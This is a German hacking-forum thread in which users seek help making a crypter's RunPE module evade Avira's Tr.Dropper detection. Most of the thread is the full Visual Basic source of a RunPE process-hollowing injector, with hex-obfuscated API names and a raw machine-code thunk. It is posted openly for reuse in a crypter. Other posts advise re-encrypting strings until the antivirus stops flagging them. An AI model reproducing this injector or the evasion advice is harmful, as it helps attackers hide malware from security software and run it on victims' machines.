RunPe wird als Tr.Dropper erkannt ?!

**inmate** · 20.03.2010, 18:57

Ich habe das geschrieben weil ich dir Beweisen wollte das Avira es nicht nur erkennt wenn man ne Datei an die Stub hängt.Dann verschlüssele die Strings halt nochmal im RunPE , solange bis Avira ruhig ist.

**locos** · 20.03.2010, 19:15

Nochmal encrypten bewirkt glaub ich auch nix.
Ich habe mal nach einander die verschiedenen Subs raus genommen
und dann gescannt. Die detection war immer da, auch nachdem ich jede sub einmal raus
genommen habe.

inmate welche runpe verwendest du in deinem crypter ?
Kannst du mir das original mal zukommen lassen ?

Greetz

Edit:
In der main die Strings habe ich auch mal verschlüsselt ohne erfolg. Tr.Dropper.Gen >.<

**inmate** · 20.03.2010, 19:30

Das RunPE von Karcrack, da es das mir einzige bekannte ist welches unter Windows 7 läuft.Habe das Originale zZ nicht da, und HackHound ist down.
Doch du musst die Strings öfters verschlüsseln das hilft, glaub mir

, lade mal das Projekt hoch ich mache es dir.

mfG

**locos** · 20.03.2010, 19:57

Mist hab jetzt das von mir verschlüsselte schon gelöscht >.<
Hab nur noch das Original von cobein hier:
http://ul.to/rz57rk

Ich werde jetzt mal das von Karcrack suchen.

Greetz

Edit:
Ist es diese RunPE die du nutzt:

Code:

'---------------------------------------------------------------------------------------
' Module      : cNtPEL
' DateTime    : 30/06/2009 06:32
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advancevb.com.ar (updated =D)
' Purpose     : Inject Exe
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Thanks to   : This is gonna be a looong list xD
'               Batfitch - kernel base asm
'               Karcrack - For helping me to debug and test it
'               Paul Caton - vTable patch examples
'               rm_code - First call api prototype
'               and different books and pappers
'
' Compile     : P-Code !!!
'
' Comments    : Coded on top of the invoke module.
'
' History     : 30/06/2009 First Cut....................................................
'               02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........
'---------------------------------------------------------------------------------------
Option Explicit

Private Const IMAGE_DOS_SIGNATURE       As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE        As Long = &H4550&

Private Const SIZE_DOS_HEADER           As Long = &H40
Private Const SIZE_NT_HEADERS           As Long = &HF8
Private Const SIZE_EXPORT_DIRECTORY     As Long = &H28
Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28

Private Const THUNK_APICALL             As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3"
Private Const THUNK_KERNELBASE          As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"

Private Const PATCH1                    As String = "<PATCH1>"
Private Const PATCH2                    As String = "<PATCH2>"

Private Const CONTEXT_FULL              As Long = &H10007
Private Const CREATE_SUSPENDED          As Long = &H4
Private Const MEM_COMMIT                As Long = &H1000
Private Const MEM_RESERVE               As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE    As Long = &H40

Private Type STARTUPINFO
    cb                          As Long
    lpReserved                  As Long
    lpDesktop                   As Long
    lpTitle                     As Long
    dwX                         As Long
    dwY                         As Long
    dwXSize                     As Long
    dwYSize                     As Long
    dwXCountChars               As Long
    dwYCountChars               As Long
    dwFillAttribute             As Long
    dwFlags                     As Long
    wShowWindow                 As Integer
    cbReserved2                 As Integer
    lpReserved2                 As Long
    hStdInput                   As Long
    hStdOutput                  As Long
    hStdError                   As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess                    As Long
    hThread                     As Long
    dwProcessID                 As Long
    dwThreadID                  As Long
End Type

Private Type FLOATING_SAVE_AREA
    ControlWord                 As Long
    StatusWord                  As Long
    TagWord                     As Long
    ErrorOffset                 As Long
    ErrorSelector               As Long
    DataOffset                  As Long
    DataSelector                As Long
    RegisterArea(1 To 80)       As Byte
    Cr0NpxState                 As Long
End Type

Private Type CONTEXT
    ContextFlags                As Long
    Dr0                         As Long
    Dr1                         As Long
    Dr2                         As Long
    Dr3                         As Long
    Dr6                         As Long
    Dr7                         As Long
    FloatSave                   As FLOATING_SAVE_AREA
    SegGs                       As Long
    SegFs                       As Long
    SegEs                       As Long
    SegDs                       As Long
    Edi                         As Long
    Esi                         As Long
    Ebx                         As Long
    Edx                         As Long
    Ecx                         As Long
    Eax                         As Long
    Ebp                         As Long
    Eip                         As Long
    SegCs                       As Long
    EFlags                      As Long
    Esp                         As Long
    SegSs                       As Long
End Type

Private Type IMAGE_DOS_HEADER
    e_magic                     As Integer
    e_cblp                      As Integer
    e_cp                        As Integer
    e_crlc                      As Integer
    e_cparhdr                   As Integer
    e_minalloc                  As Integer
    e_maxalloc                  As Integer
    e_ss                        As Integer
    e_sp                        As Integer
    e_csum                      As Integer
    e_ip                        As Integer
    e_cs                        As Integer
    e_lfarlc                    As Integer
    e_ovno                      As Integer
    e_res(0 To 3)               As Integer
    e_oemid                     As Integer
    e_oeminfo                   As Integer
    e_res2(0 To 9)              As Integer
    e_lfanew                    As Long
End Type

Private Type IMAGE_FILE_HEADER
    Machine                     As Integer
    NumberOfSections            As Integer
    TimeDateStamp               As Long
    PointerToSymbolTable        As Long
    NumberOfSymbols             As Long
    SizeOfOptionalHeader        As Integer
    Characteristics             As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress              As Long
    Size                        As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
    Magic                       As Integer
    MajorLinkerVersion          As Byte
    MinorLinkerVersion          As Byte
    SizeOfCode                  As Long
    SizeOfInitializedData       As Long
    SizeOfUnitializedData       As Long
    AddressOfEntryPoint         As Long
    BaseOfCode                  As Long
    BaseOfData                  As Long
    ImageBase                   As Long
    SectionAlignment            As Long
    FileAlignment               As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion           As Integer
    MinorImageVersion           As Integer
    MajorSubsystemVersion       As Integer
    MinorSubsystemVersion       As Integer
    W32VersionValue             As Long
    SizeOfImage                 As Long
    SizeOfHeaders               As Long
    CheckSum                    As Long
    SubSystem                   As Integer
    DllCharacteristics          As Integer
    SizeOfStackReserve          As Long
    SizeOfStackCommit           As Long
    SizeOfHeapReserve           As Long
    SizeOfHeapCommit            As Long
    LoaderFlags                 As Long
    NumberOfRvaAndSizes         As Long
    DataDirectory(0 To 15)      As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
    Signature                   As Long
    FileHeader                  As IMAGE_FILE_HEADER
    OptionalHeader              As IMAGE_OPTIONAL_HEADER
End Type

Private Type IMAGE_EXPORT_DIRECTORY
   Characteristics              As Long
   TimeDateStamp                As Long
   MajorVersion                 As Integer
   MinorVersion                 As Integer
   lpName                       As Long
   Base                         As Long
   NumberOfFunctions            As Long
   NumberOfNames                As Long
   lpAddressOfFunctions         As Long
   lpAddressOfNames             As Long
   lpAddressOfNameOrdinals      As Long
End Type

Private Type IMAGE_SECTION_HEADER
    SecName                     As String * 8
    VirtualSize                 As Long
    VirtualAddress              As Long
    SizeOfRawData               As Long
    PointerToRawData            As Long
    PointerToRelocations        As Long
    PointerToLinenumbers        As Long
    NumberOfRelocations         As Integer
    NumberOfLinenumbers         As Integer
    Characteristics             As Long
End Type

Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)

Private c_lKrnl         As Long
Private c_lLoadLib      As Long
Private c_bInit         As Boolean
Private c_lVTE          As Long
Private c_lOldVTE       As Long
Private c_bvASM(&HFF)   As Byte
        
Public Function zDoNotCall() As Long
    'This function will be replaced with machine code laterz
    'Do not add any public procedure on top of it
End Function

Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
    Dim i                       As Long
    Dim tIMAGE_DOS_HEADER       As IMAGE_DOS_HEADER
    Dim tIMAGE_NT_HEADERS       As IMAGE_NT_HEADERS
    Dim tIMAGE_SECTION_HEADER   As IMAGE_SECTION_HEADER
    Dim tSTARTUPINFO            As STARTUPINFO
    Dim tPROCESS_INFORMATION    As PROCESS_INFORMATION
    Dim tCONTEXT                As CONTEXT
    Dim lKernel                 As Long
    Dim lNTDll                  As Long
    Dim lMod                    As Long
    
    If Not c_bInit Then Exit Function

    Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER)
    
    If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
        Exit Function
    End If

    Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS)
    
    If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
        Exit Function
    End If
    
                                    'kernel32
    lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332"))                                                                                               'KPC
                                    'ntdll
    lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C"))                                                                                                   'KPC
    
    If sHost = vbNullString Then
        sHost = Space(260)
                                                'GetModuleFileNameW
        lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557"))                                                                        'KPC
        Invoke lMod, App.hInstance, StrPtr(sHost), 260
    End If
    
    With tIMAGE_NT_HEADERS.OptionalHeader
        
        tSTARTUPINFO.cb = Len(tSTARTUPINFO)
            
                                                'CreateProcessW
        lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357"))                                                                            'KPC
        Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)

                                                'NtUnmapViewOfSection
        lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E"))                                                                       'KPC
        Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
        
                                                'VirtualAllocEx
        lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578"))                                                                            'KPC
        Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
        
                                                'NtWriteVirtualMemory
        lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))                                                                       'KPC
        Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
    
        For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
            CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
        Next i

        tCONTEXT.ContextFlags = CONTEXT_FULL
        
                                                'NtGetContextThread
        lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164"))                                                                         'KPC
        Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
    
                                                'NtWriteVirtualMemory
        lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))                                                                       'KPC
        Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
       
        tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
        
                                                'NtSetContextThread
        lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164"))                                                                         'KPC
        Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
        
                                                'NtResumeThread
        lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164"))                                                                             'KPC
        Invoke lMod, tPROCESS_INFORMATION.hThread, 0
        
        hProc = tPROCESS_INFORMATION.hProcess
    End With
    
    RunPE = True
End Function

Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
    Dim lPtr        As Long
    Dim i           As Long
    Dim sData       As String
    Dim sParams     As String
    
    If lMod = 0 Then Exit Function
    
    For i = UBound(Params) To 0 Step -1
        sParams = sParams & "68" & GetLong(CLng(Params(i)))
    Next
    
    lPtr = VarPtr(c_bvASM(0))
    lPtr = lPtr + (UBound(Params) + 2) * 5
    lPtr = lMod - lPtr - 5
    
    sData = THUNK_APICALL
    sData = Replace(sData, PATCH1, sParams)
    sData = Replace(sData, PATCH2, GetLong(lPtr))
    
    Call PutThunk(sData)
    
    Invoke = PatchCall
End Function

Private Function GetLong(ByVal lData As Long) As String
    Dim bvTemp(3)   As Byte
    Dim i           As Long
    
    CpyMem bvTemp(0), lData, &H4
    For i = 0 To 3
        GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2)
    Next
End Function

Private Sub PutThunk(ByVal sThunk As String)
    Dim i   As Long
    For i = 0 To Len(sThunk) - 1 Step 2
        c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2))
    Next i
End Sub

Private Function PatchCall() As Long
    CpyMem c_lVTE, ByVal ObjPtr(Me), &H4
    c_lVTE = c_lVTE + &H1C
    CpyMem c_lOldVTE, ByVal c_lVTE, &H4
    CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4
    PatchCall = zDoNotCall
    CpyMem ByVal c_lVTE, c_lOldVTE, &H4
End Function

Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long
    GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc)
End Function

Public Function LoadLibrary(ByVal sLib As String) As Long
    LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar))
End Function

Public Property Get Initialized() As Boolean
    Initialized = c_bInit
End Property

Public Sub Class_Initialize()

    Call PutThunk(THUNK_KERNELBASE)
    
    c_lKrnl = PatchCall
    
    If Not c_lKrnl = 0 Then
        c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW")
        If Not c_lLoadLib = 0 Then
            c_bInit = True
        End If
    End If
End Sub

Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long
    Dim tIMAGE_DOS_HEADER       As IMAGE_DOS_HEADER
    Dim tIMAGE_NT_HEADERS       As IMAGE_NT_HEADERS
    Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY
    
    Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER)
    
    If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
        Exit Function
    End If

    Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS)
    
    If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
        Exit Function
    End If
    
    Dim lVAddress   As Long
    Dim lVSize      As Long
    Dim lBase       As Long
    
    With tIMAGE_NT_HEADERS.OptionalHeader
        lVAddress = lMod + .DataDirectory(0).VirtualAddress
        lVSize = lVAddress + .DataDirectory(0).Size
        lBase = .ImageBase
    End With
    
    Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY)
       
    Dim i           As Long
    Dim lFunctAdd   As Long
    Dim lNameAdd    As Long
    Dim lNumbAdd    As Long

    With tIMAGE_EXPORT_DIRECTORY
        For i = 0 To .NumberOfNames - 1
           
            CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4
            
            If StringFromPtr(lBase + lNameAdd) = sProc Then
                CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2
                CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4
                
                GetProcAddress = lFunctAdd + lBase
                             
                If GetProcAddress >= lVAddress And _
                   GetProcAddress <= lVSize Then
                    Call ResolveForward(GetProcAddress, lMod, sProc)
                    If Not lMod = 0 Then
                        GetProcAddress = GetProcAddress(lMod, sProc)
                    Else
                        GetProcAddress = 0
                    End If
                End If
                
                Exit Function
            End If
        Next
    End With
    
End Function

Private Function ResolveForward( _
       ByVal lAddress As Long, _
       ByRef lLib As Long, _
       ByRef sMod As String)
       
    Dim sForward     As String

    sForward = StringFromPtr(lAddress)
    If InStr(1, sForward, ".") Then
        lLib = LoadLibrary(Split(sForward, ".")(0))
        sMod = Split(sForward, ".")(1)
    End If
    
End Function

Private Function StringFromPtr( _
       ByVal lAddress As Long) As String
       
    Dim bChar       As Byte
    
    Do
        CpyMem bChar, ByVal lAddress, 1
        lAddress = lAddress + 1
        If bChar = 0 Then Exit Do
        StringFromPtr = StringFromPtr & Chr$(bChar)
    Loop
    
End Function

Private Function nlfpkgnrj(ByVal sData As String) As String
    Dim i       As Long
    For i = 1 To Len(sData) Step 2
       nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2)))
    Next i
End Function

**blackberry** · 20.03.2010, 20:22

Und was spricht eigentlich dagegen euer eigenes RunPE Modul zu programmieren?

**locos** · 20.03.2010, 20:32

Kannst du ja gerne tun wenn du es kannst.
Es gibt in Visual Basic keine injections methoden die nicht auf RunPE
basieren. Warum neu schreiben wenn es hunderte verschiedene Mods gibt ?
Ich selber könnte es auch nicht wenn ich erlich bin, aber wie dem auch sei
das ist nicht das Thema des Threades.

Greetz

**blackberry** · 20.03.2010, 20:52

Zitat von locos

Kannst du ja gerne tun wenn du es kannst.

Kann ich, habe ich. Allerdings nicht in VB, sondern in C. (da hat man wenigstens gescheite Header, die die PE-Strukturen und WinAPI-Funktionen definieren; das man das bei VB selber definieren muss sagst einem auch schon für welche Tätigkeiten MS VB (nicht) konzepiert hat)

Zitat von locos

Es gibt in Visual Basic keine injections methoden die nicht auf RunPE
basieren.

Und wieso nicht?
Wenn du mit RunPE dieses spezielle Modul meinst und nicht die Technik, dann wäre es ein echtes Armutszeugnis, wenn jeder das nur kopiert.

Falls du mit RunPE die benutzte Technik meinst, so ist zu sagen, dass du auch auf andere Weise einen Crypter realisieren kannst.
Dabei müsstest du zwar die Stub in ASM schreiben, aber den Crypter könntest du nach wie vor in VB schreiben.

Zitat von locos

Ich selber könnte es auch nicht wenn ich erlich bin, aber wie dem auch sei
das ist nicht das Thema des Threades.

Ich verstehe nicht wie das NICHT Thema des Threads sein kann.
Wenn du dich darüber beschwerst, dass das Modul, das du benutzt erkannt wird wäre es doch das Beste dir dein eigenes Modul zu schreiben.

MfG. BlackBerry

**locos** · 20.03.2010, 21:04

Zitat von BlackBerry

Ich verstehe nicht wie das NICHT Thema des Threads sein kann.

Naja Thema des Thread ist "RunPe wird als Tr.Dropper erkannt"
und nicht, eigene Injections Methode in VB schreiben.

Zitat von BlackBerry

Wenn du dich darüber beschwerst, dass das Modul, das du benutzt erkannt wird wäre es doch das Beste dir dein eigenes Modul zu schreiben.

Ich habe mich in keinem meiner beträge beschwert das, dass module erkannt wird.
Habe ledentlich gefragt ob mir wer helfen kann die Detection zu umgehen.

Naja will nicht diskutieren hier,
suche eigentlich nur hilfe für das Dropper problem.

Greetz

**Trillium** · 09.06.2015, 05:26

Es gibt ein Currency RunPe module von Sonnykuccio kann es die Tage mal posten

**IRET** · 09.06.2015, 20:34

Zitat von locos

Naja Thema des Thread ist "RunPe wird als Tr.Dropper erkannt"
und nicht, eigene Injections Methode in VB schreiben.

Ich habe mich in keinem meiner beträge beschwert das, dass module erkannt wird.
Habe ledentlich gefragt ob mir wer helfen kann die Detection zu umgehen.

Naja will nicht diskutieren hier,
suche eigentlich nur hilfe für das Dropper problem.

Greetz

Er hat dir ja die Lösung verraten. Schreib deinen eigenen Code.

Thema: RunPe wird als Tr.Dropper erkannt ?!

Themen-Optionen

Anzeige

AW: RunPe wird als Tr.Dropper erkannt ?!

AW: RunPe wird als Tr.Dropper erkannt ?!

Stichworte

Berechtigungen